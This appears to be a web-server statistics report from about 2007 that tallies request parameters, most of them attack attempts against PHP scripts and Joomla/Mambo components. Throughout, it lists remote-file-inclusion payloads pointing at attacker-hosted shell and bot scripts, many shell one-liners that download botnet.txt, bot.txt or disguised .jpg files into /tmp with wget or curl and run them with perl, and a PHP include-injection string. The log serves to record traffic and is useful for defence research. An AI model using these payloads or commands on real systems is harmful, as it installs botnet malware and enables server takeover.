http://ilegals.ifrance.com/enos??? 1
http://xsenharox.xpg.com.br/nfaehuaeh.txt? 1
http://xisinfo.x10hosting.com/bnd.txt? 1
http://www.xsenharox.xpg.com.br/suvbni 1
Parameter l
ValueAccesses
ezpub 23
http://204.11.228.115/id.txt? 4
Parameter theme
ValueAccesses
31
http://www.pucorp.t5.com.br/lp.txt? 18
http://204.11.228.115/id.txt? 14
http://www.freewebs.com/sethz/php.txt? 12
http://www.freewebs.com/yahwek/phpbot.txt? 12
http://www.capsoir.com/images/TRA.txt? 10
http://www.freewebs.com/yahwek/sete.txt? 9
http://www.freewebs.com/yahwek/xisde.txt.txt? 8
http://ilegals.ifrance.com/x!???? 7
http://xsenharox.xpg.com.br/suvbni? 7
Parameter x
ValueAccesses
1 19
http://204.11.228.115/id.txt? 4
OTHER: 290
ScriptTotal Accesses
/wusage/summary/cgi.html//transcripts.php 469
Parameters by Submitted Value
Parameter action
ValueAccesses
view 23
http://www.pucorp.t5.com.br/lp.txt? 18
http://204.11.228.115/id.txt? 14
http://www.freewebs.com/yahwek/phpbot.txt? 12
http://www.freewebs.com/sethz/php.txt? 11
http://www.freewebs.com/yahwek/sete.txt? 10
http://www.freewebs.com/yahwek/xisde.txt.txt? 8
http://ilegals.ifrance.com/x!???? 8
http://www.capsoir.com/images/TRA.txt? 8
http://xsenharox.xpg.com.br/suvbni? 7
Parameter cmd
ValueAccesses
idhttp://www.freewebs.com/finish007/raw.txt???? 1
Parameter deptid
ValueAccesses
1 19
http://204.11.228.115/id.txt? 4
Parameter search_string
ValueAccesses
http://204.11.228.115/id.txt? 4
http://freewebtown.com/trabalho/CMD.txt? 3
http://nartok.com/CMS/cache/cmds.txt? 2
http://xsenharox.xpg.com.br/suvbni? 2
http://zamanalwsl.net/banners/left/box.txt? 2
http://ilegals.ifrance.com/enos??? 1
http://www.xsenharox.xpg.com.br/suvbni 1
http://xsenharox.xpg.com.br/nfaehuaeh.txt? 1
http://mateus07.xpg.com.br/lol? 1
http://xisinfo.x10hosting.com/bnd.txt? 1
Parameter userid
ValueAccesses
0 19
OTHER: 289
ScriptTotal Accesses
/wusage/summary/cgi.html//message_box.php 460
Parameters by Submitted Value
Parameter cmd
ValueAccesses
idhttp://www.freewebs.com/finish007/raw.txt???? 1
Parameter l
ValueAccesses
admin 19
http://204.11.228.115/id.txt? 4
Parameter theme
ValueAccesses
27
http://www.pucorp.t5.com.br/lp.txt? 18
http://204.11.228.115/id.txt? 14
http://www.freewebs.com/yahwek/phpbot.txt? 12
http://www.freewebs.com/sethz/php.txt? 11
http://www.capsoir.com/images/TRA.txt? 10
http://www.freewebs.com/yahwek/sete.txt? 10
http://ilegals.ifrance.com/x!???? 8
http://www.freewebs.com/yahwek/xisde.txt.txt? 7
http://xsenharox.xpg.com.br/suvbni? 7
Parameter x
ValueAccesses
http://204.11.228.115/id.txt? 4
http://freewebtown.com/trabalho/CMD.txt? 3
http://xsenharox.xpg.com.br/suvbni? 2
http://zamanalwsl.net/banners/left/box.txt? 2
http://nartok.com/CMS/cache/cmds.txt? 2
http://scripts.crewhosting.com/t.txt?? 1
http://mateus07.xpg.com.br/lol? 1
http://xisinfo.x10hosting.com/bnd.txt? 1
http://xsenharox.xpg.com.br/nfaehuaeh.txt? 1
http://www.xsenharox.xpg.com.br/suvbni 1
OTHER: 294
ScriptTotal Accesses
/wusage/summary/cgi.html/components/com_phpshop/toolbar.phps
hop.html.php
456
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /var/tmp;rm botnet.txt;wget http://www.powerbikes.gr/foru
m/botnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt
;lwp-download http://www.powerbikes.gr/forum/botnet.txt;curl
-O http://www.powerbikes.gr/forum/botnet.txt;lynx http://ww
w.powerbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.t
xt
3
id 2
cd /tmp;rm botnet.txt;wget http://www.powerbikes.gr/forum/bo
tnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt;lwp
-download http://www.powerbikes.gr/forum/botnet.txt;curl -O
http://www.powerbikes.gr/forum/botnet.txt;lynx http://www.po
werbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.txt
1
cd /tmp;wget http://needforthings.com/click4tshirts/oneadmin
/eccatalog/wce.read.txt;perl wce.read.txt;rm -rf wce.read.tx
t
1
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.anje.pt/ip1.txt;wget http://www.anje.pt/ros1.txt;w
get http://www.anje.pt/scanasc.txt;curl -o ip1.txt http://ww
w.anje.pt/ip1.txt;curl -o ros1.txt http://www.anje.pt/ros1.t
xt;curl -o scanasc.txt http://www.anje.pt/scanasc.txt;perl i
p1.txt;perl ros1.txt;perl scanasc.txt
1
Parameter mosConfig_absolute_path
ValueAccesses
http://www.freewebs.com/yahwek/sete.txt? 31
http://204.11.228.115/id.txt? 16
http://www.freewebs.com/sethz/php.txt? 15
http://www.freewebs.com/yahwek/phpbot.txt? 14
http://www.pucorp.t5.com.br/lp.txt? 10
http://www.freewebs.com/yahwek/xisde.txt.txt? 10
http://mtvktv.no-ip.org/php.txt? 10
http://www.ar-vision.com/galery.txt? 9
http://ownzera.googlepages.com/readme.txt? 9
http://www.freewebs.com/haddem/botnetphp.txt 8
OTHER: 316
ScriptTotal Accesses
/wusage/summary/cgi.html//skin/zero_vote/ask_password.php 433
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm botnet.txt;wget http://www.powerbikes.gr/forum/bo
tnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt;lwp
-download http://www.powerbikes.gr/forum/botnet.txt;curl -O
http://www.powerbikes.gr/forum/botnet.txt;lynx http://www.po
werbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.txt
1
Parameter dir
ValueAccesses
http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?
?
43
http://www.vsm.gov.tr/pwnd/safe.gif? 16
http://www.indoirc.altervista.org/php5/id.txt??? 10
http://www.cypcaribbean.org/cyp/phpBB/images/smiles/bypass2.
txt??
10
http://www.ar-vision.com/galery.txt? 9
http://www.hotnews.altervista.org/cmd2.txt? 8
http://www.pucorp.t5.com.br/id2.txt??? 7
http://www.geocities.com/vie.tian/albania.txt?? 7
http://ezsm.ru/media/id.txt??? 7
http://normanzito.iespana.es/http.txt?? 7
OTHER: 308
ScriptTotal Accesses
/wusage/summary/cgi.html//js/status_image.php 400
Parameters by Submitted Value
Parameter base_url
ValueAccesses
http://www.pucorp.t5.com.br/lp.txt? 18
http://www.freewebs.com/yahwek/phpbot.txt? 12
http://www.freewebs.com/sethz/php.txt? 12
http://204.11.228.115/id.txt? 10
http://www.freewebs.com/yahwek/sete.txt? 10
http://www.capsoir.com/images/TRA.txt? 8
http://www.freewebs.com/yahwek/xisde.txt.txt? 8
http://ilegals.ifrance.com/x!???? 7
http://aszer.republika.pl/cos..txt? 6
http://contactcraze.com/ascinfo.txt?? 6
Parameter cmd
ValueAccesses
idhttp://www.freewebs.com/finish007/raw.txt???? 1
id 1
OTHER: 301
ScriptTotal Accesses
/wusage/summary/cgi.html/newspublish/include.php 399
Parameters by Submitted Value
cd /var/tmp;rm botnet.txt;wget http://www.powerbikes.gr/foru
m/botnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt
;lwp-download http://www.powerbikes.gr/forum/botnet.txt;curl
-O http://www.powerbikes.gr/forum/botnet.txt;lynx http://ww
w.powerbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.t
xt
5
cd /tmp;rm botnet.txt;wget http://www.powerbikes.gr/forum/bo
tnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt;lwp
-download http://www.powerbikes.gr/forum/botnet.txt;curl -O
http://www.powerbikes.gr/forum/botnet.txt;lynx http://www.po
werbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.txt
2
Parameter path[docroot]
ValueAccesses
http://www.freewebs.com/yahwek/sete.txt? 32
http://www.freewebs.com/sethz/php.txt? 13
http://www.freewebs.com/yahwek/phpbot.txt? 12
http://mtvktv.no-ip.org/php.txt? 11
http://www.freewebs.com/haddem/botnetphp.txt 10
http://www.pucorp.t5.com.br/lp.txt? 10
http://www.freewebs.com/yahwek/xisde.txt.txt? 9
http://ownzera.googlepages.com/readme.txt? 9
http://xsenharox.xpg.com.br/suvbni? 8
http://www.powerbikes.gr/forum/tool25.txt? 7
Parameter path[docrs-for-live-51-de.html/skins/advanced/advanced1.php?
pluginpath[0]
ValueAccesses
http://www.stdr.xpg.com.br/compito? 1
OTHER: 270
ScriptTotal Accesses
/wusage/summary/cgi.html/modules/tinycontent/admin/spaw/spaw
_control.class.php
388
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /var/tmp;rm botnet.txt;wget http://www.powerbikes.gr/foru
m/botnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt
;lwp-download http://www.powerbikes.gr/forum/botnet.txt;curl
-O http://www.powerbikes.gr/forum/botnet.txt;lynx http://ww
w.powerbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.t
xt
5
cd /tmp;curl -O http://www.auzr.kz/tender/files/INDzz2.jpg;l
wp-download http://www.auzr.kz/tender/files/INDzz2.jpg;wget
http://www.auzr.kz/tender/files/INDzz2.jpg;perl INDzz2.jpg;r
m -rf *IND*
3
cd /tmp;curl -O http://www.crcmodels.com.br/oneadmin/_arquiv
os/INDvv1.txt;lwp-download http://www.crcmodels.com.br/onead
min/_arquivos/INDvv1.txt;wget http://www.crcmodels.com.br/on
eadmin/_arquivos/INDvv1.txt;perl INDvv1.txt;rm -rf *txt*
3
cd /tmp;rm botnet.txt;wget http://www.powerbikes.gr/forum/bo
tnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt;lwp
-download http://www.powerbikes.gr/forum/botnet.txt;curl -O
http://www.powerbikes.gr/forum/botnet.txt;lynx http://www.po
werbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.txt
2
cd /tmp;rm -rf bot.txt*;wget http://www.freewebs.com/haddem/
bot.txt;lwp-download http://www.freewebs.com/haddem/bot.txt;
fetch http://www.freewebs.com/haddem/bot.txt;curl -o bot.txt
http://www.freewebs.com/haddem/bot.txt;GET http://www.freew
ebs.com/haddem/bot.txt >bot.txt;lynx -source http://www.free
webs.com/haddem/bot.txt >bot.txt;perl bot.txt;rm -rf bot.txt
*
1
cd /tmp;curl -O http://homenet.ch/downloads/INDxx2.jpg;lwp-d
ownload http://homenet.ch/downloads/INDxx2.jpg;wget http://h
omenet.ch/downloads/INDxx2.jpg;perl INDxx2.jpg;rm -rf *IND*
1
cd /tmp;curl -O http://homenet.ch/downloads/IND2.jpg;lwp-dow
nload http://homenet.ch/downloads/IND2.jpg;wget http://homen
et.ch/downloads/IND2.jpg;perl IND2.jpg;rm -rf *IND*
1
cd /tmp;curl -O http://www.auzr.kz/tender/files/INDvv1.txt;l
wp-download http://www.auzr.kz/tender/files/INDvv1.txt;wget
http://www.auzr.kz/tender/files/INDvv1.txt;perl INDvv1.txt;r
m -rf *txt*
1
cd /tmp;curl -O http://www.icpreview.com/cache/IND2.jpg;lwp-
download http://www.icpreview.com/cache/IND2.jpg;wget http:/
/www.icpreview.com/cache/IND2.jpg;perl IND2.jpg;rm -rf *IND*
1
Parameter spaw_root
ValueAccesses
http://www.freewebs.com/yahwek/sete.txt? 26
http://www.freewebs.com/sethz/php.txt? 15
http://204.11.228.115/id.txt? 10
http://www.freewebs.com/yahwek/phpbot.txt? 10
http://www.freewebs.com/haddem/botnetphp.txt 10
http://ownzera.googlepages.com/readme.txt? 9
http://www.apburo.ru/classes/adodbt/gabriel.txt? 8
http://mtvktv.no-ip.org/php.txt? 8
http://www.freewebs.com/yahwek/xisde.txt.txt? 8
http://www.powerbikes.gr/forum/tool25.txt? 7
OTHER: 259
ScriptTotal Accesses
/wusage/summary/cgi.html//setup/header.php 378
Parameters by Submitted Value
Parameter css_path
ValueAccesses
http://www.pucorp.t5.com.br/lp.txt? 18
http://www.freewebs.com/yahwek/phpbot.txt? 12
http://www.freewebs.com/sethz/php.txt? 11
http://www.freewebs.com/yahwek/sete.txt? 10
http://204.11.228.115/id.txt? 10
http://www.capsoir.com/images/TRA.txt? 8
http://www.freewebs.com/yahwek/xisde.txt.txt? 8
http://ikkyz.angelfire.com/spread.txt? 8
http://ilegals.ifrance.com/x!???? 8
http://klzor.web21.f3.k8.com.br/testador.txt 6
OTHER: 279
ScriptTotal Accesses
/wusage/summary/cgi.html//phplive/setup/header.php 345
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;curl -O http://www.auzr.kz/tender/files/INDzz2.jpg;l
wp-download http://www.auzr.kz/tender/files/INDzz2.jpg;wget
http://www.auzr.kz/tender/files/INDzz2.jpg;perl INDzz2.jpg;r
m -rf *IND*
5
cd /tmp;curl -O http://www.icpreview.com/cache/IND2.jpg;lwp-
download http://www.icpreview.com/cache/IND2.jpg;wget http:/
/www.icpreview.com/cache/IND2.jpg;perl IND2.jpg;rm -rf *IND*
5
cd /tmp;curl -O http://homenet.ch/downloads/IND2.jpg;lwp-dow
nload http://homenet.ch/downloads/IND2.jpg;wget http://homen
et.ch/downloads/IND2.jpg;perl IND2.jpg;rm -rf *IND*
4
cd /tmp;curl -O http://www.crcmodels.com.br/oneadmin/_arquiv
os/INDvv1.txt;lwp-download http://www.crcmodels.com.br/onead
min/_arquivos/INDvv1.txt;wget http://www.crcmodels.com.br/on
eadmin/_arquivos/INDvv1.txt;perl INDvv1.txt;rm -rf *txt*
3
cd /tmp;curl -O http://www.auzr.kz/tender/files/INDzz2.txt;l
wp-download http://www.auzr.kz/tender/files/INDzz2.txt;wget
http://www.auzr.kz/tender/files/INDzz2.txt;perl INDzz2.txt;r
m -rf *txt*
2
cd /tmp;curl -O http://www.auzr.kz/tender/files/INDvv1.txt;l
wp-download http://www.auzr.kz/tender/files/INDvv1.txt;wget
http://www.auzr.kz/tender/files/INDvv1.txt;perl INDvv1.txt;r
m -rf *txt*
2
cd /tmp;lwp-download http://www.miskolctapolca.hu/regbannere
kkicsi/IND2.jpg;curl -O http://www.miskolctapolca.hu/regbann
erekkicsi/IND2.jpg;wget http://www.miskolctapolca.hu/regbann
erekkicsi/IND2.jpg;perl IND2.jpg;rm -rf *IND*
2
wget http://unix-ro.net/hack/bot.txt;perl bot.txt 2
cd /tmp;curl -O http://www.mpescudero.com/colores/IND2.jpg;l
wp-download http://www.mpescudero.com/colores/IND2.jpg;wget
http://www.mpescudero.com/colores/IND2.jpg;perl IND2.jpg;rm
-rf *IND*
1
cd /tmp;lwp-download http://www.mpescudero.com/colores/IND2.
jpg;curl -O http://www.mpescudero.com/colores/IND2.jpg;wget
http://www.mpescudero.com/colores/IND2.jpg;perl IND2.jpg;rm
-rf *IND*
1
Parameter css_path
ValueAccesses
http://www.capsoir.com/images/TRA.txt? 13
http://aszer.republika.pl/cos..txt? 10
http://www.freewebs.com/yahwek/sete.txt? 10
http://www.pucorp.t5.com.br/lp.txt? 9
http://xsenharox.xpg.com.br/suvbni? 9
http://rodolfim.t35.com/rodolfo.txt? 8
http://76.162.170.34/Photos/pbot2?? 7
http://www.freewebs.com/yahwek/phpbot.txt? 6
http://www.icpreview.com/cache/cmd.jpg? 5
http://xsenharox.xpg.com.br/nfaehuaeh.txt? 5
OTHER: 236
ScriptTotal Accesses
/wusage/summary/cgi.html//components/com_galleria/galleria.h
tml.php
334
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.freewebs.com/yahwek/sete.txt? 28
http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt
??
20
http://www.freewebs.com/sethz/php.txt? 12
http://204.11.228.115/id.txt? 10
http://xsenharox.xpg.com.br/suvbni? 9
http://www.pucorp.t5.com.br/lp.txt? 8
http://www.freewebs.com/yahwek/phpbot.txt? 7
http://www.stdr.xpg.com.br/compito? 6
http://usuarios.arnet.com.ar/adrikrasnow/xx1.txt? 6
http://ilegals.ifrance.com/bbc??? 5
OTHER: 223
ScriptTotal Accesses
/wusage/summary/cgi.html//newspublish/include.php 320
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;killall perl -9;rm -rf *.txt;GET http://lolzao.pop3.
ru/RFIZAO.txt > RFIZAO.txt;perl RFIZAO.txt;rm RFIZAO.txt
1
Parameter path5Bdocroot5D
ValueAccesses
http://www.xfactor.altervista.org/php5/id.txt??? 2
Parameter path[docroot]
ValueAccesses
http://www.rayzorowns.kit.net/id.txt??? 22
http://claroline.lct-net.cl/id? 15
http://12.30.229.109/images/.../di?? 9
http://www.capsoir.com/images/TRA.txt? 6
http://www.freewebs.com/yahwek/sete.txt? 6
http://www1.gars.at/wirtschaft/modules/poll/id? 6
http://www3.bloglog.com.br/p.t? 6
http://www.tuttoscemo.com/administrator/components/com_juser
/id?
5
http://www.stdr.xpg.com.br/compito? 5
http://www.pucorp.t5.com.br/lp.txt? 4
OTHER: 233
ScriptTotal Accesses
// 318
Parameters by Submitted Value
Parameter CONFIG_EXT[ADMIN_PATH]
ValueAccesses
http://www.hagenclauss.de//vwar/convert/.r/bush?? 1
Parameter GLOBALS
ValueAccesses
18
Parameter _REQUEST
ValueAccesses
18
Parameter _REQUEST[Itemid]
ValueAccesses
1 18
Parameter _REQUEST[option]
ValueAccesses
com_sitemap 17
com_facileforms 1
Parameter a
ValueAccesses
http://www.apfinanz.de/components/com_artlinks/memei.jpg?? 11
Parameter file
ValueAccesses
viewtopic 11
Parameter highlight
ValueAccesses
%27.include($_GET[a]),exit.%27 6
%2527.include($_GET[a]),exit.%2527 5
Parameter id
ValueAccesses
25
Parameter mosConfig_absolute_path
ValueAccesses
http://easylivetalk.com/new/id.txt? 23
http://hibbard22.net/new/id.txt? 18
http://www.fm24forum.de/update/fissh/sys_cr4nk/i? 10
http://12.30.229.109/images/.../di?? 6
http://uniquantum.co.kr/.../www?? 4
http://chyna.sufx.net/test.txt?? 4
http://www.rayzorowns.kit.net/id.txt??? 4
http://www.gooteo.com/adpics/test.txt? 3
http://shadowstargames.com/test.txt??? 3
http://uniquantum.co.kr/.../robot.txt?? 3
OTHER: 109
ScriptTotal Accesses
/wusage/summary/cgi.html//modules/AllMyGuests/signin.php 268
Parameters by Submitted Value
Parameter _AMGconfig[cfg_serverpath]
ValueAccesses
http://www.freewebs.com/yahwek/sete.txt? 20
http://prepaidcard.net/new.txt? 8
http://usuarios.lycos.es/w0rms/read.txt? 8
http://geocities.com/putraaja_85/shell.txt?? 7
http://www.themaciom.com/guestbook/.dev12/id.txt?? 6
http://www.pucorp.t5.com.br/lp.txt? 5
http://rodolfim.t35.com/rodolfo.txt? 5
http://www.prepaidcard.net/new.txt? 5
http://www.stdr.xpg.com.br/compito? 5
http://bsthank.t35.com/spread.txt? 4
Parameter cmd
ValueAccesses
id 2
cd /tmp;rm -rf bot.txt*;wget http://www.freewebs.com/haddem/
bot.txt;lwp-download http://www.freewebs.com/haddem/bot.txt;
fetch http://www.freewebs.com/haddem/bot.txt;curl -o bot.txt
http://www.freewebs.com/haddem/bot.txt;GET http://www.freew
ebs.com/haddem/bot.txt >bot.txt;lynx -source http://www.free
webs.com/haddem/bot.txt >bot.txt;perl bot.txt;rm -rf bot.txt
*
1
OTHER: 192
ScriptTotal Accesses
/wusage/monthly/2007/07/01/cgi.html/index.php 264
Parameters by Submitted Value
Parameter GLOBALS
ValueAccesses
6
Parameter Itemid
ValueAccesses
61
1 10
http://www.trosken.com/id.txt? 1
Parameter _REQUEST
ValueAccesses
6
Parameter _REQUEST[Itemid]
ValueAccesses
1 6
Parameter _REQUEST[option]
ValueAccesses
com_login 3
com_content 2
com_zoom 1
Parameter headfoot
ValueAccesses
yes 1
Parameter mosConfig_absolute_path
ValueAccesses
http://www.j-vision.co.kr/company/rhe/echo? 24
http://www.dominpe.com/images/echo? 8
http://danthefarrier.co.uk/id/mic22.txt? 8
http://stmikx.freehoxt.com/Sekip/id.txt?? 4
http://www.bes.org.tr/imgcls/cmd2.txt????? 4
http://wealdentalkingnews.net/templates/sistem.txt??? 4
http://gcd.jveuger.nl/site/templates/waterandstone800/echo? 4
http://www.dominpe.com/images/echo2? 4
http://www.apfinanz.de/components/com_artlinks/memei.jpg?? 4
http://eurolinkmedia.com:3636//id.txt? 3
Parameter option
ValueAccesses
com_expose 26
com_login 20
com_galleria 9
com_config 7
com_pcchess 7
com_extcalendar 3
Parameter path[docroot]
ValueAccesses
http://mfa.gov.bt/idscan2.txt? 1
OTHER: 27
ScriptTotal Accesses
/wusage/summary// 255
Parameters by Submitted Value
Parameter CONFIG_EXT[ADMIN_PATH]
ValueAccesses
http://www.hagenclauss.de//vwar/convert/.r/bush?? 1
Parameter GLOBALS
ValueAccesses
17
Parameter _REQUEST
ValueAccesses
17
Parameter _REQUEST[Itemid]
ValueAccesses
1 17
Parameter _REQUEST[option]
ValueAccesses
com_sitemap 17
Parameter a
ValueAccesses
http://www.apfinanz.de/components/com_artlinks/memei.jpg?? 11
Parameter file
ValueAccesses
viewtopic 11
Parameter highlight
ValueAccesses
%27.include($_GET[a]),exit.%27 6
%2527.include($_GET[a]),exit.%2527 5
Parameter id
ValueAccesses
17
Parameter mosConfig_absolute_path
ValueAccesses
http://hibbard22.net/new/id.txt? 17
http://easylivetalk.com/new/id.txt? 16
http://www.rayzorowns.kit.net/id.txt??? 4
http://www.fm24forum.de/update/fissh/sys_cr4nk/i? 3
http://uniquantum.co.kr/.../robot.txt?? 3
http://www.gooteo.com/adpics/test.txt? 3
http://shadowstargames.com/test.txt??? 3
http://www.1st-articles.com/articles/friulid.txt? 2
http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? 1
http://www.key-deal.com//mambo.txt? 1
OTHER: 83
ScriptTotal Accesses
/wusage/summary/cgi.html//faqsupport/samplefaqsupport.php 250
Parameters by Submitted Value
Parameter path
ValueAccesses
http://www.mta.cl/galeria2/galery.txt? 1
Parameter path[docroot]
ValueAccesses
http://www.pucorp.t5.com.br/lp.txt? 14
http://aszer.republika.pl/cos..txt? 12
http://www.capsoir.com/images/TRA.txt? 11
http://www.g3nius.net/fuck.txt? 6
http://andravarldar.se/cmd? 6
http://hacking.org.pl/~wojtek/cos..txt? 6
http://www.aims.unc.edu/echo2.txt? 5
http://ilegals.ifrance.com/x!???? 5
http://www.stdr.xpg.com.br/compito? 5
http://xsenharox.xpg.com.br/suvbni? 5
Parameter path[docroot]http://phoenixgc.net/sikat?
ValueAccesses
2
OTHER: 172
ScriptTotal Accesses
/wusage/summary/cgi.html//help.php 243
Parameters by Submitted Value
Parameter css_path
ValueAccesses
http://www.pucorp.t5.com.br/lp.txt? 17
http://www.capsoir.com/images/TRA.txt? 13
http://aszer.republika.pl/cos..txt? 13
http://www3.bloglog.com.br/p.t? 10
http://www.g3nius.net/fuck.txt? 9
http://andravarldar.se/cmd? 8
http://h1.ripway.com/DiegoVirus/pbot2.txt? 7
http://ikkyz.angelfire.com/spread.txt? 7
http://scanbot.ru/cos.txt? 6
http://www.fuck-all.kit.net/pbot2.txt? 6
OTHER: 147
ScriptTotal Accesses
/wusage/summary/cgi.html/display.php 231
Parameters by Submitted Value
Parameter cmd
ValueAccesses
id 1
Parameter pag
ValueAccesses
http://www.pucorp.t5.com.br/lp.txt? 18
http://www.capsoir.com/images/TRA.txt? 10
http://ownzera.googlepages.com/readme.txt? 9
http://www.stdr.xpg.com.br/compito? 8
http://aszer.republika.pl/cos..txt? 6
http://contactcraze.com/ascinfo.txt?? 6
http://ilegals.ifrance.com/x!???? 6
http://usuarios.arnet.com.ar/adrikrasnow/xx1.txt? 6
http://www.g3nius.net/fuck.txt? 5
http://andravarldar.se/cmd? 5
OTHER: 151
ScriptTotal Accesses
/wusage/summary/cgi.html//components/com_extcalendar/admin_e
vents.php
218
Parameters by Submitted Value
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://www.tuttoscemo.com/administrator/components/com_juser
/id?
17
http://www.stdr.xpg.com.br/compito? 10
http://www.freewebs.com/sethz/php.txt? 10
http://www.ar-vision.com/galery.txt? 9
http://xsenharox.xpg.com.br/suvbni? 9
http://www.visionnoir.com/newsreport/id.txt?? 8
http://normanzito.iespana.es/http.txt?? 5
http://xsenharox.xpg.com.br/nfaehuaeh.txt? 5
http://mateus07.xpg.com.br/lol? 5
http://www.freewebs.com/yahwek/sete.txt? 5
Parameter CONFIG_EXT[LANGUAGES_DIR]http://efedece.ihostbr.com/perfil/t
estinbox.txt?
ValueAccesses
1
Parameter CONFIG_EXT[LANGUAGES_DIR]http://prepaidcard.net/new.txt?
ValueAccesses
1
Parameter CONFIG_EXT[LANGUAGES_DIR]http://www.rtz-bonn.de/nwrt012007/i
nclude/muie.txt?
ValueAccesses
1
OTHER: 132
ScriptTotal Accesses
/wusage/summary/cgi.html/components/com_performs/performs.ph
p
213
Parameters by Submitted Value
Parameter cmd
ValueAccesses
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.anje.pt/ip1.txt;wget http://www.anje.pt/ros1.txt;w
get http://www.anje.pt/scanasc.txt;curl -o ip1.txt http://ww
w.anje.pt/ip1.txt;curl -o ros1.txt http://www.anje.pt/ros1.t
xt;curl -o scanasc.txt http://www.anje.pt/scanasc.txt;perl i
p1.txt;perl ros1.txt;perl scanasc.txt
3
cd /var/tmp;rm botnet.txt;wget http://www.powerbikes.gr/foru
m/botnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt
;lwp-download http://www.powerbikes.gr/forum/botnet.txt;curl
-O http://www.powerbikes.gr/forum/botnet.txt;lynx http://ww
w.powerbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.t
xt
2
cd /tmp;wget http://needforthings.com/click4tshirts/oneadmin
/eccatalog/wce.read.txt;perl wce.read.txt;rm -rf wce.read.tx
t
1
id 1
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.vwbr.com.br/ip1.txt;wget http://www.vwbr.com.br/ro
s1.txt;wget http://www.vwbr.com.br/scanasc.txt;curl -o ip1.t
xt http://www.vwbr.com.br/ip1.txt;curl -o ros1.txt http://ww
w.vwbr.com.br/ros1.txt;curl -o scanasc.txt http://www.vwbr.c
om.br/scanasc.txt;perl ip1.txt;perl ros1.txt;perl scanasc.tx
t
1
Parameter mosConfig_absolute_path
ValueAccesses
http://ownzera.googlepages.com/readme.txt? 9
http://www.freewebs.com/sethz/php.txt? 9
http://204.11.228.115/id.txt? 8
http://www.rayzorowns.kit.net/id.txt??? 6
http://www.ar-vision.com/galery.txt? 5
http://www.freewebs.com/yahwek/sete.txt? 5
http://gimpindustries.net/ca/images/arab.txt? 4
http://mateus07.xpg.com.br/lol? 4
http://www.freewebs.com/haddem/phpbot.txt 4
http://xsenharox.xpg.com.br/suvbni? 4
OTHER: 147
ScriptTotal Accesses
/wusage/summary/cgi.html/help.php 203
Parameters by Submitted Value
Parameter cmd
ValueAccesses
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.anje.pt/ip1.txt;wget http://www.anje.pt/ros1.txt;w
get http://www.anje.pt/scanasc.txt;curl -o ip1.txt http://ww
w.anje.pt/ip1.txt;curl -o ros1.txt http://www.anje.pt/ros1.t
xt;curl -o scanasc.txt http://www.anje.pt/scanasc.txt;perl i
p1.txt;perl ros1.txt;perl scanasc.txt
2
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.vwbr.com.br/ip1.txt;wget http://www.vwbr.com.br/ro
s1.txt;wget http://www.vwbr.com.br/scanasc.txt;curl -o ip1.t
xt http://www.vwbr.com.br/ip1.txt;curl -o ros1.txt http://ww
w.vwbr.com.br/ros1.txt;curl -o scanasc.txt http://www.vwbr.c
om.br/scanasc.txt;perl ip1.txt;perl ros1.txt;perl scanasc.tx
t
1
cd /tmp;wget http://needforthings.com/click4tshirts/oneadmin
/eccatalog/wce.read.txt;perl wce.read.txt;rm -rf wce.read.tx
t
1
id 1
Parameter css_path
ValueAccesses
http://www.freewebs.com/yahwek/sete.txt? 10
http://www.freewebs.com/sethz/php.txt? 10
http://204.11.228.115/id.txt? 10
http://ownzera.googlepages.com/readme.txt? 9
http://www.pucorp.t5.com.br/lp.txt? 6
http://netbr.org/documents/r57.txt? 5
http://www.freewebs.com/yahwek/phpbot.txt? 4
http://xsenharox.xpg.com.br/suvbni? 4
http://mateus07.xpg.com.br/lol? 4
http://mtvktv.no-ip.org/php.txt? 4
OTHER: 132
ScriptTotal Accesses
/wusage/summary/cgi.html// 195
Parameters by Submitted Value
Parameter CONFIG_EXT[ADMIN_PATH]
ValueAccesses
http://www.hagenclauss.de//vwar/convert/.r/bush?? 1
Parameter GLOBALS
ValueAccesses
17
Parameter _REQUEST
ValueAccesses
17
Parameter _REQUEST[Itemid]
ValueAccesses
1 17
Parameter _REQUEST[option]
ValueAccesses
com_sitemap 17
Parameter id
ValueAccesses
17
Parameter mosConfig_absolute_path
ValueAccesses
http://hibbard22.net/new/id.txt? 17
http://easylivetalk.com/new/id.txt? 16
http://www.mateus07.xpg.com.br/lol??? 5
http://www.rayzorowns.kit.net/id.txt??? 4
http://xsenharox.xpg.com.br/suvbni? 3
http://www.fm24forum.de/update/fissh/sys_cr4nk/i? 3
http://xsenharox.xpg.com.br/e_real_nois.txt? 3
http://www.1st-articles.com/articles/friulid.txt? 2
http://normanzito.iespana.es/http.txt?? 2
http://mateus07.xpg.com.br/lol? 1
Parameter option
ValueAccesses
com_login= 17
Parameter pag
ValueAccesses
http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?
?
1
